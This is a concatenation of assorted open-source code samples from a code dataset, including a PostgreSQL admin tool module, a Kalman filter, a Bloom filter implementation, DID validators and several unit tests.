converter.load_and_set_caffe_weights(proto_path=proto_path, save_path=save_path)

# Testing: run the same image through the converted Caffe net and compare.
net_caffe = caffe.Net(proto_path, save_path, caffe.TEST)
net_caffe.blobs['data'].data[0] = preprocess(img)
assert net_caffe.blobs['data'].data[0].shape == (3, im_s, im_s)
net_caffe.forward()
result_caffe = net_caffe.blobs['Convolution5'].data[0]
result_caffe = result_caffe.transpose((1, 2, 0))  # c, h, w -> h, w, c
# Small norm of the difference indicates a successful conversion.
print(np.linalg.norm(result_tf - result_caffe))
| StarcoderdataPython |
1658155 | <filename>BackEnd/api/service/user_search.py
def build_user_search_schema(user_search):
    """Serialize a user-search record into a plain dict for the API."""
    return {
        'search_subject': user_search.search_subject,
        'search_id': user_search.search_id,
    }
| StarcoderdataPython |
1749976 | <reponame>codescribblr/project-manager-django3<filename>vapor_manager/users/forms.py
from django.contrib.auth import forms, get_user_model
User = get_user_model()
class UserChangeForm(forms.UserChangeForm):
    """Admin change form rebound to the project's custom user model."""

    class Meta(forms.UserChangeForm.Meta):
        model = User
class UserCreationForm(forms.UserCreationForm):
    """Creation form for the custom user model, collecting only the email.

    NOTE(review): ``field_classes = {}`` clears the base class's mapping
    (which targets the username field) — presumably because this model
    authenticates by email; confirm against the user model.
    """

    class Meta(forms.UserCreationForm.Meta):
        model = User
        fields = ("email",)
        field_classes = {}
| StarcoderdataPython |
3350302 | # The Admin4 Project
# (c) 2013-2014 <NAME>
#
# Licensed under the Apache License,
# see LICENSE.TXT for conditions of usage
from _objects import ServerObject, DatabaseObject
from wh import xlt, YesNo
class Database(ServerObject):
    """Admin4 tree node for a PostgreSQL database: discovery, connection
    management, object search, and the property panel."""
    typename=xlt("Database")
    shortname=xlt("Database")

    @staticmethod
    def GetInstances(parentNode):
        """Query pg_database (user databases only) and build child nodes."""
        instances=[]
        params={'sysrestr': " WHERE d.oid > %s" % parentNode.GetServer().GetLastSysOid() }
        set=parentNode.GetCursor().ExecuteSet("""
SELECT d.*, pg_encoding_to_char(encoding) AS pgencoding, pg_get_userbyid(datdba) AS dbowner, spcname, d.oid, description
  FROM pg_database d
  JOIN pg_tablespace t ON t.oid=dattablespace
  LEFT JOIN pg_shdescription des ON des.objoid=d.oid
 %(sysrestr)s
 ORDER BY datname
""" % params)
        if set:
            for row in set:
                if not row:
                    break
                instances.append(Database(parentNode, row['datname'], row.getDict()))
        for db in instances:
            db.favourites=db.GetServer().GetFavourites(db)
        return instances

    def __init__(self, parentNode, name, info):
        super(Database, self).__init__(parentNode, name)
        self.info=info

    def GetDatabase(self):
        """A database node is its own database context."""
        return self

    def GetIcon(self):
        """Icon reflects connection state; maintenance DB gets a pg badge."""
        icons=[]
        if self.IsConnected():
            icons.append("Database-conn")
        else:
            icons.append("Database-noconn")
        if self.IsMaintenanceConnection():
            icons.append("pg")
        return self.GetImageId(icons)

    def IsMaintenanceConnection(self):
        """True when this database is the server's maintenance database."""
        return self.name == self.GetServer().maintDb

    def IsConnected(self):
        # The maintenance database shares the server's connection.
        if self.IsMaintenanceConnection():
            return self.GetServer().IsConnected()
        return self.connection != None

    def DoConnect(self):
        """Open a new connection to this database via the server node."""
        return self.GetServer().DoConnect(self.name)

    def FindObject(self, patterns, schemaOid, kind=None):
        """
        FindObject(patterns, schemaOid, kind)

        Finds all objects matching the pattern list;
        if patterns[0] includes a dot, schemaOid is overridden.
        """
        # relkind: r = ordinary table, i = index, S = sequence, v = view, m = materialized view,
        #          c = composite type, t = TOAST table, f = foreign table
        #          P=Proc
        queries=[]
        if len(patterns) > 1:
            type=patterns[0]
            patterns=patterns[1:]
        else:
            type=None
        # A dotted first pattern carries an explicit schema name.
        dp=patterns[0].find('.')
        if dp>0:
            schemaName=patterns[0][:dp]
            patterns[0]=patterns[0][dp+1:]
        else:
            schemaName=None
        # Collect one sub-query per registered node class that supports search.
        for ni in self.moduleinfo()['nodes'].values():
            cls=ni['class']
            if hasattr(cls, 'FindQuery'):
                if not kind or kind == cls.relkind:
                    sql=cls.FindQuery(schemaName, schemaOid, patterns)
                    queries.append(sql.SelectQueryString())
        result=self.GetCursor().ExecuteDictList("%s\n\nORDER BY 1, 2, 3" % "\nUNION\n".join(queries))
        return result

    def GetConnection(self):
        """Return the live connection, opening one lazily if needed."""
        if self.IsMaintenanceConnection():
            return self.GetServer()
        if not self.connection:
            self.connection = self.DoConnect()
            self.IconUpdate(True)
            self.properties=[]  # force the property panel to refresh
        else:
            self.CheckConnection(self.connection)
        return self.connection

    def GetCursor(self):
        conn=self.GetConnection()
        if conn:
            return conn.GetCursor()
        return None

    def DoDisconnect(self):
        """Close the connection and refresh the node's icon."""
        self.connection.Disconnect()
        self.connection = None
        self.IconUpdate(True)

    def GetProperties(self):
        """Lazily build the property-panel rows (languages, extensions,
        encoding, ownership, etc.)."""
        if not len(self.properties):
            # NOTE(review): ``dict`` shadows the builtin here.
            dict=self.GetCursor().ExecuteDict("""
SELECT 'languages', array_agg(lanname) as lannames
  FROM (SELECT lanname FROM pg_language ORDER BY lanispl desc, lanname) AS langlist""")
            self.info.update(dict)
            if self.GetServer().version >= 9.1:
                # Extensions exist from PostgreSQL 9.1 on.
                dict=self.GetCursor().ExecuteDict("""
SELECT 'extensions', array_agg(name) as extnames
  FROM (SELECT extname || ' V' || extversion AS name FROM pg_extension ORDER BY extname) AS extlist
UNION
SELECT 'available_extensions', array_agg(name) as extnames
  FROM (SELECT name || ' V' || default_version AS name FROM pg_available_extensions WHERE installed_version is null ORDER BY name) AS avextlist
""")
                self.info.update(dict)
            self.properties = [
                (xlt("Name"), self.name),
                (    "OID" , self.info['oid']),
                (xlt("Owner"), self.info['dbowner']),
                (xlt("Tablespace"), self.info['spcname']),
                (xlt("Encoding"), self.info['pgencoding']),
                (xlt("Connected"), YesNo(self.IsConnected())),
            ]
            self.AddProperty(xlt("Backend PID"), self.GetCursor().GetPid())
            if self.info['datistemplate']:
                self.AddYesNoProperty(xlt("Template"), True)
            if 'datctype' in self.info:
                self.AddProperty(xlt("Collate"), self.info['datcollate'])
                self.AddProperty(xlt("CType"), self.info['datctype'])
            self.AddProperty(xlt("Languages"), ", ".join(self.info['languages']))
            ext=self.info.get('extensions')
            if ext != None:
                if ext:
                    ext=", ".join(ext)
                self.AddProperty(xlt("Installed Extensions"), ext)
                avext=self.info.get('available_extensions')
                if avext:
                    avext=", ".join(avext)
                    self.AddProperty(xlt("Available Extensions"), avext)
            self.AddProperty(xlt("Description"), self.info['description'])
        return self.properties
class Programming(DatabaseObject):
    """Grouping node that collects programming-related database objects."""

    typename = "Programming"
    shortname = "Programming"

    @staticmethod
    def GetInstances(parentNode):
        """Return the single Programming child node for *parentNode*."""
        return [Programming(parentNode, "")]

    def GetProperties(self):
        """This grouping node has no properties of its own."""
        return []
# Tree registration: Database nodes appear under Server nodes; the
# Programming grouping node registration is kept disabled for now.
nodeinfo= [ { "class": Database, "parents": ["Server"], "sort": 30, "pages": "SqlPage" },
#           { 'class': Programming, 'parents': Database, 'sort': 50 }
           ]
class DbDisconnect:
    """Context-menu command that closes a database node's connection."""

    name = xlt("Disconnect")
    help = xlt("Disconnect database connection")

    @staticmethod
    def CheckEnabled(node):
        """Enable the menu entry only while the node has an open connection."""
        # Identity comparison is the idiomatic None check; `!= None` would
        # invoke a custom __ne__ if the connection object defined one.
        return node.connection is not None

    @staticmethod
    def OnExecute(_parentWin, node):
        """Close the node's database connection."""
        node.DoDisconnect()
# Context-menu registration: the Disconnect command applies to Database nodes.
menuinfo=[
        {"class": DbDisconnect, "nodeclasses": Database , "sort": 1 } ,
        ]
| StarcoderdataPython |
4834354 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This module contains unit tests of the arc.job.job module
"""
from __future__ import (absolute_import, division, print_function, unicode_literals)
import unittest
import os
import datetime
from arc.job.job import Job
from arc.settings import arc_path
################################################################################
class TestJob(unittest.TestCase):
    """
    Contains unit tests for the Job class
    """

    @classmethod
    def setUpClass(cls):
        """
        A method that is run before all unit tests in this class.
        Builds one representative Job instance shared by all tests.
        """
        cls.maxDiff = None
        # Minimal ESS settings mapping each electronic-structure package to
        # its servers; ssh is disabled so no remote connection is attempted.
        ess_settings = {'gaussian': ['server1','server2'], 'molpro': ['server2'], 'qchem': ['server1'], 'ssh': False}
        cls.job1 = Job(project='project_test', ess_settings=ess_settings, species_name='tst_spc', xyz='C 0.0 0.0 0.0',
                       job_type='opt', level_of_theory='b3lyp/6-31+g(d)', multiplicity=1, testing=True,
                       project_directory=os.path.join(arc_path, 'Projects', 'project_test'), fine=True, job_num=100)
        # Pin start/end times exactly one second apart so run_time is
        # deterministic (1.0 second) in the assertions below.
        cls.job1.initial_time = datetime.datetime(2019, 3, 15, 19, 53, 7, 0)
        cls.job1.final_time = datetime.datetime(2019, 3, 15, 19, 53, 8, 0)
        cls.job1.determine_run_time()

    def test_as_dict(self):
        """Test Job.as_dict()"""
        job_dict = self.job1.as_dict()
        # Take the timestamps from the generated dict itself, so the test
        # pins their presence without depending on their serialized format.
        initial_time = job_dict['initial_time']
        final_time = job_dict['final_time']
        expected_dict = {'initial_time': initial_time,
                         'final_time': final_time,
                         'run_time': 1.0,
                         'ess_trsh_methods': [],
                         'trsh': '',
                         'initial_trsh': {},
                         'fine': True,
                         'job_id': 0,
                         'job_name': 'opt_a100',
                         'job_num': 100,
                         'job_server_name': 'a100',
                         'job_status': ['initializing', 'initializing'],
                         'job_type': 'opt',
                         'level_of_theory': 'b3lyp/6-31+g(d)',
                         'memory': 1500,
                         'occ': None,
                         'pivots': [],
                         'project_directory': os.path.join(arc_path, 'Projects', 'project_test'),
                         'scan': '',
                         'server': None,
                         'shift': '',
                         'max_job_time': 120,
                         'comments': '',
                         'scan_res': 8.0,
                         'scan_trsh': '',
                         'software': 'gaussian',
                         'xyz': 'C 0.0 0.0 0.0'}
        self.assertEqual(job_dict, expected_dict)
################################################################################
# Allow running this test module directly with verbose output.
if __name__ == '__main__':
    unittest.main(testRunner=unittest.TextTestRunner(verbosity=2))
| StarcoderdataPython |
3387047 | from math import sin, cos, tan, radians
# Read an angle in degrees, convert it to radians, and print its sine,
# cosine and tangent rounded to two decimal places.
ang = float(input("Digite um ângulo: "))
angr = radians(ang)
for nome, valor in (('O seno', sin(angr)), ('O cosseno', cos(angr)), ('A tangente', tan(angr))):
    print(f'{nome} de {ang} é {valor:.2f}')
3397431 | <filename>lang/py/cookbook/v2/source/cb2_15_8_exm_2.py
IOR:010000001d00000049444c3a466f7274756e652f436f6f6b69655365727665723
a312e300000000001000000000000005c000000010102000d0000003135382e313234
2e36342e330000f90a07000000666f7274756e6500020000000000000008000000010
0000000545441010000001c0000000100000001000100010000000100010509010100
0100000009010100
| StarcoderdataPython |
32761 | <filename>src/kalman_filter.py
#!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2021 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import numpy as np
class kalman_filter:
    """Extended Kalman filter for planar motion.

    Fuses body-frame acceleration and yaw-rate inputs (prediction) with
    absolute (x, y) position measurements (correction), and records the
    full state/covariance trajectory.
    """

    # State : A column vector with [x_pos, y_pos, yaw, x_vel, y_vel]
    def __init__(self, init_state, init_time, accel_var, yaw_var, meas_var):
        """Initialize the filter state, noise models and history buffers.

        init_state -- iterable of 5 values [x_pos, y_pos, yaw, x_vel, y_vel]
        init_time  -- timestamp of the initial state
        accel_var  -- variance of the x/y acceleration input noise
        yaw_var    -- variance of the yaw-rate input noise
        meas_var   -- variance of the x/y position measurement noise
        """
        self.state = np.asarray(init_state).reshape(5,1)
        self.prev_time = init_time
        # Start with zero uncertainty; grows through process noise Q.
        self.covar = np.zeros((5,5))
        # Process (input) noise covariance: accel on x/y, yaw rate on yaw.
        self.Q = np.diag([accel_var, accel_var, yaw_var])
        # Measurement noise covariance for the (x, y) position observation.
        self.R = np.diag([meas_var, meas_var])
        # History of [value, time, tag] entries; tag 0 = prediction step,
        # tag 1 = measurement update.
        self.states = []
        self.covars = []

    # Input : A column vector with [x_accel, y_accel, yaw_vel]
    def update(self, inp, time):
        """Prediction step: propagate state and covariance with the input.

        inp  -- [x_accel, y_accel, yaw_vel]; accelerations are expressed in
                the body frame and rotated into the global frame by the yaw.
        time -- timestamp of the input sample (dt = time - prev_time).
        """
        inp = np.asarray(inp).reshape(3,1)
        dt = time - self.prev_time
        # Transition matrix :
        #
        #  | 1 0 0 dt 0  |
        #  | 0 1 0 0  dt |
        #  | 0 0 1 0  0  |
        #  | 0 0 0 1  0  |
        #  | 0 0 0 0  1  |
        #
        A = np.asarray([\
                [1, 0, 0, dt,0], \
                [0, 1, 0, 0, dt],\
                [0, 0, 1, 0, 0], \
                [0, 0, 0, 1, 0], \
                [0, 0, 0, 0, 1] \
                ])
        # Input influence matrix
        #
        #  | 0  0  0  |
        #  | 0  0  0  |
        #  | 0  0  dt |
        #  | dt 0  0  |
        #  | 0  dt 0  |
        #
        B = np.asarray([\
                [0, 0, 0], \
                [0, 0, 0], \
                [0, 0, dt],\
                [dt,0, 0], \
                [0, dt,0], \
                ])
        # Rotate the body-frame acceleration into the global frame using
        # the current yaw estimate.
        yaw = self.state[2][0]
        accel_xl = inp[0][0]
        accel_yl = inp[1][0]
        accel_xg = accel_xl * np.cos(yaw) - accel_yl * np.sin(yaw)
        accel_yg = accel_xl * np.sin(yaw) + accel_yl * np.cos(yaw)
        # Partial derivatives of the velocity update w.r.t. yaw and the two
        # acceleration inputs; these populate the Jacobians used below.
        dxvel_dyaw = -dt * (inp[0][0] * np.sin(self.state[2][0]) + inp[1][0] * np.cos(self.state[2][0]))
        dyvel_dyaw = dt * (inp[0][0] * np.cos(self.state[2][0]) - inp[1][0] * np.sin(self.state[2][0]))
        dxvel_din1 = dt * np.cos(self.state[2][0])
        dxvel_din2 = -dt * np.sin(self.state[2][0])
        dyvel_din1 = dt * np.sin(self.state[2][0])
        dyvel_din2 = dt * np.cos(self.state[2][0])
        g_inp = np.asarray([accel_xg, accel_yg, inp[2][0]]).reshape(3,1)
        # State updation with input
        self.state = A.dot(self.state) + B.dot(g_inp)
        # Wrap yaw into (-pi, pi].
        if(self.state[2][0] > np.pi):
            self.state[2][0] = self.state[2][0] - 2 * np.pi
        elif(self.state[2][0] < -np.pi):
            self.state[2][0] = self.state[2][0] + 2 * np.pi
        # Jacobian of the motion model w.r.t. the state (EKF linearization).
        A = np.asarray([\
                [1, 0, 0, dt,0], \
                [0, 1, 0, 0, dt],\
                [0, 0, 1, 0, 0], \
                [0, 0, dxvel_dyaw, 1, 0], \
                [0, 0, dyvel_dyaw, 0, 1] \
                ])
        # Jacobian of the motion model w.r.t. the input.
        B = np.asarray([\
                [0, 0, 0], \
                [0, 0, 0], \
                [0, 0, dt],\
                [dxvel_din1, dxvel_din2, 0], \
                [dyvel_din1, dyvel_din2, 0], \
                ])
        # Covariance update
        self.covar = A.dot(self.covar.dot(A.T)) + B.dot(self.Q.dot(B.T))
        # Append to trajectory
        self.states.append([self.state, time, 0])
        self.covars.append([self.covar, time, 0])
        # Update previous time
        self.prev_time = time

    def measure(self, measurement, time):
        """Correction step with an absolute (x, y) position measurement."""
        # Observation matrix: the measurement observes only x_pos and y_pos.
        H = np.asarray([\
                [1, 0, 0, 0, 0], \
                [0, 1, 0, 0, 0], \
                ])
        measurement = np.asarray(measurement).reshape(2,1)
        # Innovation: error between measurement and expected measurement.
        V = measurement - H.dot(self.state)
        # Innovation covariance and Kalman gain.
        S = H.dot(self.covar.dot(H.T)) + self.R
        K = self.covar.dot(H.T.dot(np.linalg.inv(S)))
        self.state = self.state + K.dot(V)
        self.covar = self.covar - K.dot(S.dot(K.T))
        # Append to trajectory
        self.states.append([self.state, time, 1])
        self.covars.append([self.covar, time, 1])

    # Return position
    def get_pos(self):
        """Return the most recent history entry: [state, time, tag].

        NOTE(review): despite the name, this returns the whole history
        triple, not just the position — callers index into it.
        """
        return (self.states[len(self.states)-1])
| StarcoderdataPython |
4815968 | import os
from setuptools import setup, find_packages

# Read install requirements directly from requirements.txt instead of via
# pip._internal.req.parse_requirements: pip's internal API is not stable
# (InstallRequirement.req was removed in pip 20.1, which breaks the old
# `str(ir.req)` pattern). Blank lines and comments are skipped.
with open('requirements.txt') as req_file:
    reqs = [line.strip() for line in req_file
            if line.strip() and not line.strip().startswith('#')]
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
    """Return the contents of *fname*, resolved relative to this file."""
    path = os.path.join(os.path.dirname(__file__), fname)
    # Use a context manager so the handle is closed even on error, and pin
    # UTF-8: the platform default (e.g. cp1252 on Windows) can fail on
    # non-ASCII characters in README.md.
    with open(path, encoding="utf-8") as f:
        return f.read()
# Package registration: metadata below, long description from README.md,
# and install dependencies from requirements.txt (via `reqs`).
setup(name="emailme",
      version="0.3.0",
      author="<NAME>",
      author_email="<EMAIL>",
      description=("Super simple self-emailing."),
      license="MIT",
      packages=find_packages(),
      keywords="email",
      url="http://github.com/ericmjl/emailme",
      package_data={'': ['README.md']},
      install_requires=reqs,
      long_description=read('README.md'),
      long_description_content_type="text/markdown",
      # Expose the `emailme` console command backed by the Click CLI.
      entry_points={'console_scripts': ['emailme=emailme.cli:cli']}
      )
| StarcoderdataPython |
1758720 | import re
from factom_did.client.constants import DID_METHOD_NAME
from factom_did.client.enums import KeyType, Network
def validate_alias(alias):
    """Raise ValueError unless *alias* is 1-32 chars of lower-case
    letters, digits and hyphens."""
    alias_pattern = re.compile(r"^[a-z0-9-]{1,32}$")
    if alias_pattern.match(alias) is None:
        raise ValueError(
            "Alias must not be more than 32 characters long and must contain only lower-case "
            "letters, digits and hyphens."
        )
def validate_did(did):
    """Raise ValueError unless *did* is a well-formed DID string
    (method name, optional network prefix, 64 hex chars)."""
    did_pattern = "^{}:({}:|{}:)?[a-f0-9]{{64}}$".format(
        DID_METHOD_NAME, Network.Mainnet.value, Network.Testnet.value
    )
    if re.match(did_pattern, did) is None:
        raise ValueError("Controller must be a valid DID.")
def validate_full_key_identifier(did):
    """Raise ValueError unless *did* is a well-formed DID followed by a
    '#<alias>' key fragment."""
    key_id_pattern = "^{}:({}:|{}:)?[a-f0-9]{{64}}#[a-zA-Z0-9-]{{1,32}}$".format(
        DID_METHOD_NAME, Network.Mainnet.value, Network.Testnet.value
    )
    if re.match(key_id_pattern, did) is None:
        raise ValueError("Controller must be a valid DID.")
def validate_service_endpoint(endpoint):
    """Raise ValueError unless *endpoint* is an http(s) URL."""
    endpoint_pattern = re.compile(
        r"^(http|https):\/\/(\w+:{0,1}\w*@)?(\S+)(:[0-9]+)?(\/|\/([\w#!:.?+=&%@!\-\/]))?$"
    )
    if endpoint_pattern.match(endpoint) is None:
        raise ValueError(
            "Endpoint must be a valid URL address starting with http:// or https://."
        )
def validate_priority_requirement(priority_requirement):
    """Raise ValueError unless *priority_requirement* is None or a
    non-negative integer.

    None means "no requirement" and is accepted as-is.
    """
    if priority_requirement is None:
        return
    # `not isinstance(...)` replaces the unidiomatic `isinstance(...) is False`.
    # Note: bool is an int subclass, so True/False pass the isinstance check,
    # matching the original behavior.
    if not isinstance(priority_requirement, int) or priority_requirement < 0:
        raise ValueError("Priority requirement must be a non-negative integer.")
def validate_key_type(key_type):
    """Raise ValueError unless *key_type* is a supported signature type."""
    supported = (KeyType.ECDSA, KeyType.EdDSA, KeyType.RSA)
    if key_type not in supported:
        raise ValueError("Type must be a valid signature type.")
| StarcoderdataPython |
3378083 | from justgood import imjustgood
# Create the API client (replace the placeholder with a real API key).
api = imjustgood("YOUR_APIKEY_HERE")
# Query the Joox music endpoint for the song "lathi" and dump the raw JSON.
data = api.joox("lathi")
print(data)

# EXAMPLE GET CERTAIN ATTRIBUTES
# Assemble a human-readable summary from selected fields of the response.
result = "Singer : {}".format(data["result"]["singer"])
result += "\nTitle : {}".format(data["result"]["title"])
result += "\nDuration : {}".format(data["result"]["duration"])
result += "\nSize : {}".format(data["result"]["size"])
result += "\n\nThumbnail :\n{}".format(data["result"]["thumbnail"])
result += "\n\nM4a :\n{}".format(data["result"]["m4aUrl"])
result += "\n\nMp3 :\n{}".format(data["result"]["mp3Url"])
print(result)
| StarcoderdataPython |
50029 | import supriya.nonrealtime
def test_01():
    """A fresh session spans only [-inf, 0] and has zero duration."""
    session = supriya.nonrealtime.Session()
    assert session.offsets == [float("-inf"), 0.0]
    assert session.duration == 0.0
def test_02():
    """An open-ended group at 0 adds an +inf offset but no duration."""
    session = supriya.nonrealtime.Session()
    with session.at(0):
        session.add_group()
    assert session.offsets == [float("-inf"), 0.0, float("inf")]
    assert session.duration == 0.0
def test_03():
    """An open-ended group at 23.5 extends the duration to 23.5."""
    session = supriya.nonrealtime.Session()
    with session.at(23.5):
        session.add_group()
    assert session.offsets == [float("-inf"), 0.0, 23.5, float("inf")]
    assert session.duration == 23.5
def test_04():
    """A 1-second group at 23.5 ends at 24.5, which becomes the duration."""
    session = supriya.nonrealtime.Session()
    with session.at(23.5):
        session.add_group(duration=1.0)
    assert session.offsets == [float("-inf"), 0.0, 23.5, 24.5]
    assert session.duration == 24.5
def test_05():
    """Open-ended and finite groups combine their offsets; the finite
    group's end sets the duration."""
    session = supriya.nonrealtime.Session()
    with session.at(0):
        session.add_group()
    with session.at(23.5):
        session.add_group(duration=1.0)
    assert session.offsets == [float("-inf"), 0.0, 23.5, 24.5, float("inf")]
    assert session.duration == 24.5
def test_06():
    """Padding alone does not extend an empty session."""
    session = supriya.nonrealtime.Session(padding=11.0)
    assert session.offsets == [float("-inf"), 0.0]
    assert session.duration == 0.0
def test_07():
    """Padding is not applied when all content sits at offset 0."""
    session = supriya.nonrealtime.Session(padding=11.0)
    with session.at(0):
        session.add_group()
    assert session.offsets == [float("-inf"), 0.0, float("inf")]
    assert session.duration == 0.0
def test_08():
    """Padding of 11 extends the 23.5 content to a 34.5 duration."""
    session = supriya.nonrealtime.Session(padding=11.0)
    with session.at(23.5):
        session.add_group()
    assert session.offsets == [float("-inf"), 0.0, 23.5, float("inf")]
    assert session.duration == 34.5
def test_09():
    """Padding of 11 after the finite group's end (24.5) gives 35.5."""
    session = supriya.nonrealtime.Session(padding=11.0)
    with session.at(23.5):
        session.add_group(duration=1.0)
    assert session.offsets == [float("-inf"), 0.0, 23.5, 24.5]
    assert session.duration == 35.5
def test_10():
    """Padding applies after the latest finite event even when an
    open-ended group is also present."""
    session = supriya.nonrealtime.Session(padding=11.0)
    with session.at(0):
        session.add_group()
    with session.at(23.5):
        session.add_group(duration=1.0)
    assert session.offsets == [float("-inf"), 0.0, 23.5, 24.5, float("inf")]
    assert session.duration == 35.5
| StarcoderdataPython |
1764793 | <gh_stars>1-10
import path_utils
from Evolve import Evolve
# Alternative configurations kept for quick experimentation:
#e = Evolve('MountainCar-v0', NN='FFNN_multilayer')
#e = Evolve('CartPole-v0', NN='FFNN', search_method='bin_grid_search')
# Evolve a feed-forward NN controller for MountainCar with sparse binary
# grid search over the weight space.
e = Evolve('MountainCar-v0', NN='FFNN', search_method='sparse_bin_grid_search')
#e = Evolve('MountainCar-v0', NN='FFNN')
# Run the search for 20000 iterations, scoring each candidate over 3 trials,
# then plot the score history and replay the best episode.
evo_dict = e.evolve(20000, N_trials=3)
e.plot_scores(evo_dict, show_plot=True)
e.show_best_episode(evo_dict['best_weights'])
| StarcoderdataPython |
3740 | import math
from sys import exit
# Bloom filter sizing: for an expected element count n and a target
# false-positive probability P, the bit-array size is m = -(n*log2(P)) / ln(2)
# and the number of hash functions is k = -log2(P).
# The hash family is (((i + 1)*x + p(i+1)) mod M) mod m, where x is the key,
# i is the hash-function index, p(i) is the i-th prime, and M is the Mersenne
# prime 2^31 - 1 = 2 147 483 647.
# The first k primes are computed once in the BloomFilter constructor and
# stored on the instance.
# Python has no built-in bit array, so BitArray below wraps a bytearray and
# exposes: set a bit, test a bit, and render the array as a '0'/'1' string.
Mersen_31 = 2147483647
class BitArray:
    """Fixed-size bit array backed by a bytearray (MSB-first per byte)."""

    def __init__(self, size):
        # ceil(size / 8) bytes hold `size` bits; -(-size // 8) is integer
        # ceiling division, avoiding the float round-trip through math.ceil.
        self.__array = bytearray(-(-size // 8))
        self.__size = size

    def add_bit(self, i):
        """Set bit *i* to 1 (bit i lives in byte i // 8, position i % 8)."""
        self.__array[i // 8] |= 1 << (7 - (i % 8))

    def check_bit(self, i):
        """Return True if bit *i* is set."""
        return bool(self.__array[i // 8] & (1 << (7 - (i % 8))))

    def print(self):
        """Return the bits as a '0'/'1' string of length *size*."""
        # format(byte, "08b") zero-pads each byte; join runs in O(n) versus
        # the original quadratic string concatenation.
        bits = "".join(format(byte, "08b") for byte in self.__array)
        return bits[:self.__size]
class BloomFilter:
    """Bloom filter over integer keys.

    Sized from the expected element count *n* and the target false-positive
    probability *p*: size = -n*log2(p)/ln(2) bits and hash_numbers = -log2(p)
    hash functions (both rounded).
    """

    def __init__(self, n: int, p: float):
        self.size = int(-round(n * math.log2(p) / math.log(2)))
        self.hash_numbers = int(-round(math.log2(p)))
        self.__prime_numbers = list()
        # Precompute the first hash_numbers + 1 primes used by the hash family.
        self.__get_prime(self.hash_numbers + 1)
        self.__bitarray = BitArray(self.size)

    def __get_prime(self, prime_size):
        """Fill self.__prime_numbers with the first *prime_size* primes.

        Incremental trial division: after seeding with 2, only odd
        candidates are tested, and only against the odd primes found so far
        (index 0, the 2, is skipped since odd candidates are never even).
        """
        if prime_size == 1:
            self.__prime_numbers.append(2)
            return
        self.__prime_numbers.append(2)
        i = 3
        while len(self.__prime_numbers) < prime_size:
            j = 1
            prime_flag = True
            while j < len(self.__prime_numbers):
                if (i % self.__prime_numbers[j]) == 0:
                    prime_flag = False
                    break
                j += 1
            if prime_flag:
                self.__prime_numbers.append(i)
            i += 2

    def __get_hash(self, x, i):
        # Hash family: (((i + 1)*x + p(i+1)) mod M) mod size, with
        # M = Mersen_31 = 2^31 - 1.
        return (((i + 1) * x + self.__prime_numbers[i]) % Mersen_31) % self.size

    def add(self, key: int):
        """Set the bit for each of the hash_numbers hash values of *key*."""
        i = 0
        while i < self.hash_numbers:
            self.__bitarray.add_bit(self.__get_hash(key, i))
            i += 1

    def search(self, key: int):
        """Return False if *key* is definitely absent, True if it may be present."""
        i = 0
        while i < self.hash_numbers:
            if not self.__bitarray.check_bit(self.__get_hash(key, i)):
                return False
            i += 1
        return True

    def print(self):
        """Return the underlying bit array as a '0'/'1' string."""
        return self.__bitarray.print()
bloom_filter = 0
# Phase 1: read commands until a valid "set <n> <p>" line arrives, then
# construct the filter; malformed input prints "error" and keeps waiting.
while True:
    try:
        line = input().split()
        if len(line) == 0:
            continue
        else:
            if line[0] == "set":
                try:
                    elements_number = int(line[1])
                    probability = float(line[2])
                    # n must be positive and p strictly between 0 and 1.
                    if (elements_number <= 0) | (probability <= 0) | (probability >= 1):
                        print("error")
                        continue
                    bloom_filter = BloomFilter(elements_number, probability)
                    # Degenerate parameters can round size or hash count to 0.
                    if (bloom_filter.size == 0) | (bloom_filter.hash_numbers == 0):
                        print("error")
                        continue
                    break
                except TypeError:
                    print("error")
                    continue
            else:
                print("error")
                continue
    except EOFError:
        exit()
print(bloom_filter.size, bloom_filter.hash_numbers)
# Phase 2: process "add <key>", "search <key>" and "print" commands until
# end of input; search prints 1 (possibly present) or 0 (definitely absent).
while True:
    try:
        line = input().split()
        if len(line) == 0:
            continue
        elif line[0] == "print":
            print(bloom_filter.print())
        elif (line[0] == "add") & (line[1].isnumeric()):
            bloom_filter.add(int(line[1]))
        elif (line[0] == "search") & (line[1].isnumeric()):
            print(int(bloom_filter.search(int(line[1]))))
        else:
            print("error")
    except EOFError:
        break
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.